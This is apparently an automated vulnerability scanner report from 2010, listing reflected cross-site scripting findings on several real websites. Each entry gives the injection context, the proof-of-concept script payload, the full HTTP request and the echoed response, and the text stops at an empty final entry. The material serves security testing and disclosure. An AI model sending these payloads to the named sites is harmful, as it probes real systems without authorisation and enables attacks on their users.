GET /directbanking/rewards-online-checking-account/index.php?886ff"><a>d6272b7f5f7=1 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:34:08 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 20896
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/rewards-online-checking-account/index.php?886ff"><a>d6272b7f5f7=1" name="dest"> ...[SNIP]...
4.115. http://www.care2.com/news/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.care2.com
Path:
/news/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d8e38--><script>alert(1)</script>b3adf90cce7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /news/?d8e38--><script>alert(1)</script>b3adf90cce7=1 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml"><head><titl ...[SNIP]... <!--UID:www.care2.com://news/?d8e38--><script>alert(1)</script>b3adf90cce7=1--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26138"-alert(1)-"0ee04136db8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mercury26138"-alert(1)-"0ee04136db8?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c HTTP/1.1 Host: www.carpricesecrets.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 00:41:38 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: Apache=174.121.222.18.1291768898731966; path=/; expires=Tue, 03-Dec-30 00:41:38 GMT X-Powered-By: PHP/5.2.10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE" Set-Cookie: PHPSESSID=nja7pdckk1p8p265igbsfpdss1; path=/; domain=www.carpricesecrets.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:41:38 GMT; path=/; domain=www.carpricesecrets.com Set-Cookie: landing_id=70445853; expires=Wed, 15-Dec-2010 00:41:38 GMT; path=/; domain=www.carpricesecrets.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28358
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Get the Lowest New Car Price Quotes at CarPriceSecrets.com</tit ...[SNIP]... <script language="JavaScript"> s_clven.server="www.carpricesecrets.com"; s_clven.channel="/mercury26138"-alert(1)-"0ee04136db8"; s_clven.pageName="DLP - Home"; s_clven.prop1="1"; s_clven.eVar1="1"; s_clven.prop7="999"; s_clven.prop8="999"; s_clven.eVar32="Paid"; s_clven.eVar35="MSN"; s_clven.eVar40="MSN"; s_clven.eVar7 ...[SNIP]...
The value of the t_se request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fcfc"%3balert(1)//65f5a7af97d was submitted in the t_se parameter. This input was echoed as 6fcfc";alert(1)//65f5a7af97d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mercury?t_se=msn6fcfc"%3balert(1)//65f5a7af97d&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c HTTP/1.1 Host: www.carpricesecrets.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:37:17 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: Apache=174.121.222.18.1291768637415138; path=/; expires=Tue, 03-Dec-30 00:37:17 GMT X-Powered-By: PHP/5.2.10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE" Set-Cookie: PHPSESSID=7f0frbsr23sg52h5vr938p5rh6; path=/; domain=www.carpricesecrets.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:37:17 GMT; path=/; domain=www.carpricesecrets.com Set-Cookie: landing_id=70445588; expires=Wed, 15-Dec-2010 00:37:17 GMT; path=/; domain=www.carpricesecrets.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27782
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Get the Lowest Mercury Price Quotes at CarPriceSecrets.com</tit ...[SNIP]... secrets.com"; s_clven.channel="/mercury"; s_clven.pageName="DLP - Make"; s_clven.prop1="1"; s_clven.eVar1="1"; s_clven.prop7="28"; s_clven.prop8="999"; s_clven.eVar32="Paid"; s_clven.eVar35="Msn6fcfc";alert(1)//65f5a7af97d"; s_clven.eVar40="Msn6fcfc";alert(1)//65f5a7af97d"; s_clven.eVar7="Step1: Quote-Make Landing Page"; s_clven.events="event8"; s_clven.linkTrackVars="events"; s_clven.linkTrackEvents="event6";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a23"-alert(1)-"fcaab4586c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 00:37:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28376
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Get the Lowest New Car Price Quotes at CarPriceSecrets.com</tit ...[SNIP]... <script language="JavaScript"> s_clven.server="www.carpricesecrets.com"; s_clven.channel="/page_footer_frame.php66a23"-alert(1)-"fcaab4586c4"; s_clven.pageName="DLP - Home"; s_clven.prop1="1"; s_clven.eVar1="1"; s_clven.prop7="999"; s_clven.prop8="999"; s_clven.eVar32="Paid"; s_clven.eVar35="Other"; s_clven.eVar40="Other"; s_clven.e ...[SNIP]...
The value of the body request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd418"%3balert(1)//e4085e9112c was submitted in the body parameter. This input was echoed as dd418";alert(1)//e4085e9112c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the make request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f52f4"%3balert(1)//3f9bb776ae6 was submitted in the make parameter. This input was echoed as f52f4";alert(1)//3f9bb776ae6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the model request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4618"%3balert(1)//6061c83775c was submitted in the model parameter. This input was echoed as e4618";alert(1)//6061c83775c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9da9c"><script>alert(1)</script>160b9bba87f was submitted in the zip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd5a3"%3balert(1)//92b78caf9f0 was submitted in the zip parameter. This input was echoed as dd5a3";alert(1)//92b78caf9f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.124. http://www.chefuniforms.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.chefuniforms.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cc4c"><script>alert(1)</script>ffe87a90c50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?3cc4c"><script>alert(1)</script>ffe87a90c50=1 HTTP/1.1 Host: www.chefuniforms.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML> <HEAD> <TITLE>Chef Uniforms| Chef Coats| Chef Pants| Restaurant Uniforms| UA Chef</TI ...[SNIP]... <a href="http://espanol.chefuniforms.com/?language=ES&3cc4c"><script>alert(1)</script>ffe87a90c50=1"> ...[SNIP]...
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 22a41<script>alert(1)</script>3dcb1d257de was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mngi/tracking/track?s=571&c=1679114222a41<script>alert(1)</script>3dcb1d257de&t=VIEWED&n=1 HTTP/1.1 Host: www.contracostatimes.com Proxy-Connection: keep-alive Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo&nclick_check=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: EMETA_COOKIE_CHECK_MNGI=1; EMETA_NCLICK_MNGI=1; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI
The value of the n request parameter is copied into the HTML document as plain text between tags. The payload 93341<script>alert(1)</script>7159b8e8cfb was submitted in the n parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mngi/tracking/track?s=571&c=16791142&t=VIEWED&n=193341<script>alert(1)</script>7159b8e8cfb HTTP/1.1 Host: www.contracostatimes.com Proxy-Connection: keep-alive Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo&nclick_check=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: EMETA_COOKIE_CHECK_MNGI=1; EMETA_NCLICK_MNGI=1; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI
The value of the s request parameter is copied into the HTML document as plain text between tags. The payload bab11<script>alert(1)</script>0508f974553 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mngi/tracking/track?s=571bab11<script>alert(1)</script>0508f974553&c=16791142&t=VIEWED&n=1 HTTP/1.1 Host: www.contracostatimes.com Proxy-Connection: keep-alive Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo&nclick_check=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: EMETA_COOKIE_CHECK_MNGI=1; EMETA_NCLICK_MNGI=1; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI
The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 89e7f<script>alert(1)</script>2873876c36c was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mngi/tracking/track?s=571&c=16791142&t=VIEWED89e7f<script>alert(1)</script>2873876c36c&n=1 HTTP/1.1 Host: www.contracostatimes.com Proxy-Connection: keep-alive Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo&nclick_check=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: EMETA_COOKIE_CHECK_MNGI=1; EMETA_NCLICK_MNGI=1; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI
The value of the startImage request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dc282%3balert(1)//343e8b95b71 was submitted in the startImage parameter. This input was echoed as dc282;alert(1)//343e8b95b71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /portlet/article/html/render_gallery.jsp?articleId=16791142&siteId=571&startImage=1dc282%3balert(1)//343e8b95b71 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4114"><script>alert(1)</script>9d120642e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11c4114"><script>alert(1)</script>9d120642e10/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 39436 Content-Type: text/html Set-Cookie: PHPSESSID=d6a73598f9978391c2205ab5e9145c2b; path=/ Expires: Wed, 08 Dec 2010 01:53:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 01:53:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <form ID='formInvisible' action="/11c4114"><script>alert(1)</script>9d120642e10/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f24"><script>alert(1)</script>a0cb6e97ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27c9f24"><script>alert(1)</script>a0cb6e97ed4/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 39436 Content-Type: text/html Set-Cookie: PHPSESSID=8f59c76a9cacce8e9532d4697b0120ae; path=/ Expires: Wed, 08 Dec 2010 01:53:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 01:53:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <form ID='formInvisible' action="/11/27c9f24"><script>alert(1)</script>a0cb6e97ed4/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload badca"><script>alert(1)</script>840eb5b57bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10badca"><script>alert(1)</script>840eb5b57bb/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 39436 Content-Type: text/html Set-Cookie: PHPSESSID=a96889acab8e90335903fdcfa578c9bc; path=/ Expires: Wed, 08 Dec 2010 01:54:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 01:54:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <form ID='formInvisible' action="/11/27/10badca"><script>alert(1)</script>840eb5b57bb/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86eea"><script>alert(1)</script>20250ebeef8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S86eea"><script>alert(1)</script>20250ebeef8/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 39436 Content-Type: text/html Set-Cookie: PHPSESSID=e1e3fc513c1e3f5b5cf41aea57029c60; path=/ Expires: Wed, 08 Dec 2010 01:54:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 01:54:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <form ID='formInvisible' action="/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S86eea"><script>alert(1)</script>20250ebeef8/landing_urban_v3.html"> ...[SNIP]...
The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64b58"><script>alert(1)</script>7b6e2d2f2d2 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html?blockID=361571&feedID=587964b58"><script>alert(1)</script>7b6e2d2f2d2 HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 18082 Content-Type: text/html Set-Cookie: PHPSESSID=97bf35ad0f489bcd4c706121e3a217dd; path=/ Expires: Wed, 08 Dec 2010 01:52:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 01:52:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <a href="javascript:void(0);popup('/pages/email_landing?share_url=/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html?blockID=361571^feedID=587964b58"><script>alert(1)</script>7b6e2d2f2d2^',300,500);" rel="nofollow"> ...[SNIP]...
4.135. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8debb"><script>alert(1)</script>64a6bf924c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html?blockID=361571&feedID=5879&8debb"><script>alert(1)</script>64a6bf924c5=1 HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 54243 Content-Type: text/html Set-Cookie: PHPSESSID=9cebb891959167bd241885fe826bb63e; path=/ Expires: Wed, 08 Dec 2010 01:53:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 01:53:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <a href="javascript:void(0);popup('/pages/email_landing?share_url=/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html?blockID=361571^feedID=5879^8debb"><script>alert(1)</script>64a6bf924c5=1^',300,500);" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef97f"><img%20src%3da%20onerror%3dalert(1)>a34f8ea287a was submitted in the REST URL parameter 2. This input was echoed as ef97f"><img src=a onerror=alert(1)>a34f8ea287a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
